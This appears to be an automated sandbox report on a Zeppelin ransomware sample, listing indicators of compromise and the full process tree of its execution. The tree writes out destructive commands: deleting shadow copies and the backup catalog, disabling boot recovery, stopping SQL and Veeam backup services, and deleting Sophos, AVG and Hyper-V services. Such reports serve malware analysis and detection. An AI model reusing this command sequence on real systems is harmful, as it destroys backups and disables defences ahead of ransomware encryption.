3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	4564	WMIC.exe
Token: SeSecurityPrivilege	4564	WMIC.exe
Token: SeTakeOwnershipPrivilege	4564	WMIC.exe
Token: SeLoadDriverPrivilege	4564	WMIC.exe
Token: SeSystemProfilePrivilege	4564	WMIC.exe
Token: SeSystemtimePrivilege	4564	WMIC.exe
Token: SeProfSingleProcessPrivilege	4564	WMIC.exe
Token: SeIncBasePriorityPrivilege	4564	WMIC.exe
Token: SeCreatePagefilePrivilege	4564	WMIC.exe
Token: SeBackupPrivilege	4564	WMIC.exe
Token: SeRestorePrivilege	4564	WMIC.exe
Token: SeShutdownPrivilege	4564	WMIC.exe
Token: SeDebugPrivilege	4564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4564	WMIC.exe
Token: SeRemoteShutdownPrivilege	4564	WMIC.exe
Token: SeUndockPrivilege	4564	WMIC.exe
Token: SeManageVolumePrivilege	4564	WMIC.exe
Token: 33	4564	WMIC.exe
Token: 34	4564	WMIC.exe
Token: 35	4564	WMIC.exe
Token: 36	4564	WMIC.exe
Token: SeIncreaseQuotaPrivilege	684	WMIC.exe
Token: SeSecurityPrivilege	684	WMIC.exe
Token: SeTakeOwnershipPrivilege	684	WMIC.exe
Token: SeLoadDriverPrivilege	684	WMIC.exe
Token: SeSystemProfilePrivilege	684	WMIC.exe
Token: SeSystemtimePrivilege	684	WMIC.exe
Token: SeProfSingleProcessPrivilege	684	WMIC.exe
Token: SeIncBasePriorityPrivilege	684	WMIC.exe
Token: SeCreatePagefilePrivilege	684	WMIC.exe
Token: SeBackupPrivilege	684	WMIC.exe
Token: SeRestorePrivilege	684	WMIC.exe
Token: SeShutdownPrivilege	684	WMIC.exe
Token: SeDebugPrivilege	684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	684	WMIC.exe
Token: SeRemoteShutdownPrivilege	684	WMIC.exe
Token: SeUndockPrivilege	684	WMIC.exe
Token: SeManageVolumePrivilege	684	WMIC.exe
Token: 33	684	WMIC.exe
Token: 34	684	WMIC.exe
Token: 35	684	WMIC.exe
Token: 36	684	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4564	WMIC.exe
Token: SeSecurityPrivilege	4564	WMIC.exe
Token: SeTakeOwnershipPrivilege	4564	WMIC.exe
Token: SeLoadDriverPrivilege	4564	WMIC.exe
Token: SeSystemProfilePrivilege	4564	WMIC.exe
Token: SeSystemtimePrivilege	4564	WMIC.exe
Token: SeProfSingleProcessPrivilege	4564	WMIC.exe
Token: SeIncBasePriorityPrivilege	4564	WMIC.exe
Token: SeCreatePagefilePrivilege	4564	WMIC.exe
Token: SeBackupPrivilege	4564	WMIC.exe
Token: SeRestorePrivilege	4564	WMIC.exe
Token: SeShutdownPrivilege	4564	WMIC.exe
Token: SeDebugPrivilege	4564	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4564	WMIC.exe
Token: SeRemoteShutdownPrivilege	4564	WMIC.exe
Token: SeUndockPrivilege	4564	WMIC.exe
Token: SeManageVolumePrivilege	4564	WMIC.exe
Token: 33	4564	WMIC.exe
Token: 34	4564	WMIC.exe
Token: 35	4564	WMIC.exe
Token: 36	4564	WMIC.exe
Token: SeIncreaseQuotaPrivilege	684	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.execmd.execmd.exe

description	pid	process	target process
PID 3276 wrote to memory of 1104	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 1104	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 1104	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 4212	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 4212	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 4212	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 852	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 852	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 852	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 2940	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 2940	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 2940	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 2692	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 2692	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 2692	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 1584	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 1584	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 1584	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	cmd.exe
PID 3276 wrote to memory of 4280	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
PID 3276 wrote to memory of 4280	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
PID 3276 wrote to memory of 4280	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
PID 3276 wrote to memory of 3668	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
PID 3276 wrote to memory of 3668	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
PID 3276 wrote to memory of 3668	3276	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe	2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
PID 1584 wrote to memory of 684	1584	cmd.exe	WMIC.exe
PID 1584 wrote to memory of 684	1584	cmd.exe	WMIC.exe
PID 1584 wrote to memory of 684	1584	cmd.exe	WMIC.exe
PID 1104 wrote to memory of 4564	1104	cmd.exe	WMIC.exe
PID 1104 wrote to memory of 4564	1104	cmd.exe	WMIC.exe
PID 1104 wrote to memory of 4564	1104	cmd.exe	WMIC.exe
PID 1584 wrote to memory of 2040	1584	cmd.exe	WMIC.exe
PID 1584 wrote to memory of 2040	1584	cmd.exe	WMIC.exe
PID 1584 wrote to memory of 2040	1584	cmd.exe	WMIC.exe
PID 1584 wrote to memory of 4056	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4056	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4056	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 2980	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 2980	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 2980	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4760	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4760	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4760	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4872	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4872	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4872	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 2524	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 2524	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 2524	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4516	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4516	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4516	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 412	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 412	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 412	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4932	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4932	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4932	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4000	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4000	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4000	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 3892	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 3892	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 3892	1584	cmd.exe	sc.exe
PID 1584 wrote to memory of 4472	1584	cmd.exe	sc.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
"C:\Users\Admin\AppData\Local\Temp\2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe"
1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3276
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4564
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
  2⤵
  PID:4212
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
  2⤵
  PID:2940
- C:\Users\Admin\AppData\Local\Temp\2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
  "C:\Users\Admin\AppData\Local\Temp\2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe" -agent 1
  2⤵
  PID:3668
- C:\Users\Admin\AppData\Local\Temp\2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe
  "C:\Users\Admin\AppData\Local\Temp\2024-02-26_b2a478d698a2789ce04d8d54158a7d64_zeppelin.exe" -agent 0
  2⤵
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:4280
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1584
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:684
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    WMIC.exe shadowcopy delete /nointeractive
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher$CITRIX
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher$CITRIX start=disabled
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher
    3⤵
    - Launches sc.exe
    PID:4760
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher start=disabled
    3⤵
    PID:4872
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$CITRIX
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$CITRIX start=disabled
    3⤵
    - Launches sc.exe
    PID:4516
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    - Launches sc.exe
    PID:412
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLSERVERAGENT
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLSERVERAGENT start=disabled
    3⤵
    - Launches sc.exe
    PID:3892
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSOLAP$CITRIX
    3⤵
    PID:4472
- - C:\Windows\SysWOW64\sc.exe
    sc config MSOLAP$CITRIX start=disabled
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLBrowser
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLBrowser start=disabled
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLWriter
    3⤵
    PID:2068
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLWriter start=disabled
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$SQLEXPRESS
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$SQLEXPRESS start=disabled
    3⤵
    PID:3528
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    - Launches sc.exe
    PID:3992
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:3720
- - C:\Windows\SysWOW64\sc.exe
    sc stop postgresql-9.5
    3⤵
    PID:1280
- - C:\Windows\SysWOW64\sc.exe
    sc config postgresql-9.5 start=disabled
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsdevcon
    3⤵
    PID:3596
- - C:\Windows\SysWOW64\sc.exe
    sc config fsdevcon start=disabled
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\sc.exe
    sc stop fshoster
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\sc.exe
    sc config fshoster start=disabled
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsnethoster
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\sc.exe
    sc config fsnethoster start=disabled
    3⤵
    - Launches sc.exe
    PID:2704
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulhoster
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulhoster start=disabled
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulnethoster
    3⤵
    PID:3496
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulnethoster start=disabled
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulorsp
    3⤵
    - Launches sc.exe
    PID:928
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulorsp start=disabled
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsulprothoster
    3⤵
    - Launches sc.exe
    PID:1512
- - C:\Windows\SysWOW64\sc.exe
    sc config fsulprothoster start=disabled
    3⤵
    PID:348
- - C:\Windows\SysWOW64\sc.exe
    sc stop FSAUS
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\sc.exe
    sc config FSAUS start=disabled
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\sc.exe
    sc stop fsms
    3⤵
    - Launches sc.exe
    PID:4988
- - C:\Windows\SysWOW64\sc.exe
    sc config fsms start=disabled
    3⤵
    PID:2072
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamAWSSvc
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamAWSSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:1668
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamAzureSvc
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamAzureSvc start=disabled
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamEnterpriseManagerSvc
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamEnterpriseManagerSvc start=disabled
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupRESTSvc
    3⤵
    - Launches sc.exe
    PID:2032
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupRESTSvc start=disabled
    3⤵
    PID:4516
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupSvc
    3⤵
    PID:4904
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:3908
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamFilesysVssSvc
    3⤵
    PID:916
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamFilesysVssSvc start=disabled
    3⤵
    PID:4500
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBrokerSvc
    3⤵
    - Launches sc.exe
    PID:4848
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBrokerSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:392
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamBackupCdpSvc
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamBackupCdpSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:936
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamCloudSvc
    3⤵
    PID:3596
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamCloudSvc start=disabled
    3⤵
    PID:2528
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamTransportSvc
    3⤵
    PID:4768
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamTransportSvc start=disabled
    3⤵
    PID:2480
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamDistributionSvc
    3⤵
    - Launches sc.exe
    PID:4932
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamDistributionSvc start=disabled
    3⤵
    PID:4000
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamExplorersRecoverySvc
    3⤵
    PID:4764
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamExplorersRecoverySvc start=disabled
    3⤵
    PID:1248
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamGCPSvc
    3⤵
    PID:3196
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamGCPSvc start=disabled
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamGuestHelper
    3⤵
    PID:3804
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamGuestHelper start=disabled
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamCatalogSvc
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamCatalogSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:3764
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamHvIntegrationSvc
    3⤵
    - Launches sc.exe
    PID:1452
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamHvIntegrationSvc start=disabled
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamDeploySvc
    3⤵
    PID:684
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamDeploySvc start=disabled
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamMountSvc
    3⤵
    - Launches sc.exe
    PID:3396
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamMountSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:2252
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamRESTSvc
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamRESTSvc start=disabled
    3⤵
    PID:4648
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamNFSSvc
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamNFSSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:4992
- - C:\Windows\SysWOW64\sc.exe
    sc stop VeeamVssProviderSvc
    3⤵
    - Launches sc.exe
    PID:2408
- - C:\Windows\SysWOW64\sc.exe
    sc config VeeamVssProviderSvc start=disabled
    3⤵
    - Launches sc.exe
    PID:2428
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher$CITRIX start= disabled
    3⤵
    - Launches sc.exe
    PID:4664
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher$CITRIX
    3⤵
    PID:3204
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$VEEAMSQL2016
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$VEEAMSQL2016 start=disabled
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLBrowser
    3⤵
    PID:3088
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLBrowser start=disabled
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$VEEAMSQL2016
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$VEEAMSQL2016 start=disabled
    3⤵
    PID:4316
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLWriter
    3⤵
    - Launches sc.exe
    PID:2992
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLWriter start=disabled
    3⤵
    PID:684
- - C:\Windows\SysWOW64\sc.exe
    sc stop SageMySQL
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\sc.exe
    sc config SageMySQL start=disabled
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$VEEAMSQL2016
    3⤵
    - Launches sc.exe
    PID:4356
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$VEEAMSQL2016 start=disabled
    3⤵
    - Launches sc.exe
    PID:1564
- - C:\Windows\SysWOW64\sc.exe
    sc stop ReportServer$V4SQLEXPRESS
    3⤵
    PID:4472
- - C:\Windows\SysWOW64\sc.exe
    sc config ReportServer$V4SQLEXPRESS start=disabled
    3⤵
    - Launches sc.exe
    PID:1980
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$SDPRO_V4_SQL
    3⤵
    - Launches sc.exe
    PID:3192
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$SDPRO_V4_SQL start=disabled
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$MICROSOFT##WID
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$MICROSOFT##WID start=disabled
    3⤵
    - Launches sc.exe
    PID:1276
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLServerOLAPService
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLServerOLAPService start=disabled
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLFDLauncher
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLFDLauncher start=disabled
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLSERVERAGENT
    3⤵
    - Launches sc.exe
    PID:4000
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLSERVERAGENT start=disabled
    3⤵
    - Launches sc.exe
    PID:4508
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:3324
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    - Launches sc.exe
    PID:4056
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY
    3⤵
    PID:752
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY start=disabled
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\sc.exe
    sc stop MsDtsServer130
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\sc.exe
    sc config MsDtsServer130 start=disabled
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\sc.exe
    sc stop SQLTELEMETRY$BVMS
    3⤵
    - Launches sc.exe
    PID:4464
- - C:\Windows\SysWOW64\sc.exe
    sc config SQLTELEMETRY$BVMS start=disabled
    3⤵
    PID:1360
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQL$SQLEXPRESS2014
    3⤵
    - Launches sc.exe
    PID:5072
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQL$SQLEXPRESS2014 start=disabled
    3⤵
    - Launches sc.exe
    PID:3200
- - C:\Windows\SysWOW64\sc.exe
    sc stop MSSQLSERVER
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\sc.exe
    sc config MSSQLSERVER start=disabled
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmickvpexchange"
    3⤵
    PID:1384
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicguestinterface"
    3⤵
    PID:1424
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicshutdown"
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicheartbeat"
    3⤵
    - Launches sc.exe
    PID:412
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicrdv"
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\sc.exe
    sc delete "storflt"
    3⤵
    PID:4016
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmictimesync"
    3⤵
    PID:432
- - C:\Windows\SysWOW64\sc.exe
    sc delete "vmicvss"
    3⤵
    - Launches sc.exe
    PID:3088
- - C:\Windows\SysWOW64\sc.exe
    sc delete "hvdsvc"
    3⤵
    PID:5004
- - C:\Windows\SysWOW64\sc.exe
    sc delete "nvspwmi"
    3⤵
    PID:752
- - C:\Windows\SysWOW64\sc.exe
    sc delete "wmms"
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AvgAdminServer"
    3⤵
    - Launches sc.exe
    PID:1796
- - C:\Windows\SysWOW64\sc.exe
    sc delete "AVG Antivirus"
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\sc.exe
    sc delete "avgAdminClient"
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVService"
    3⤵
    PID:3992
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SAVAdminService"
    3⤵
    PID:3924
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos AutoUpdate Service"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Clean Service"
    3⤵
    PID:844
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Device Control Service"
    3⤵
    PID:2700
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Endpoint Defense Service"
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos File Scanner Service"
    3⤵
    PID:348
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Health Service"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Agent"
    3⤵
    PID:3908
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos MCS Client"
    3⤵
    - Launches sc.exe
    PID:3892
- - C:\Windows\SysWOW64\sc.exe
    sc delete "SntpService"
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swc_service"
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_service"
    3⤵
    - Launches sc.exe
    PID:1620
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos UI"
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\sc.exe
    sc delete "swi_update"
    3⤵
    PID:4732
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Web Control Service"
    3⤵
    PID:1608
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos System Protection Service"
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\sc.exe
    sc delete "Sophos Safestore Service"
    3⤵
    PID:3752
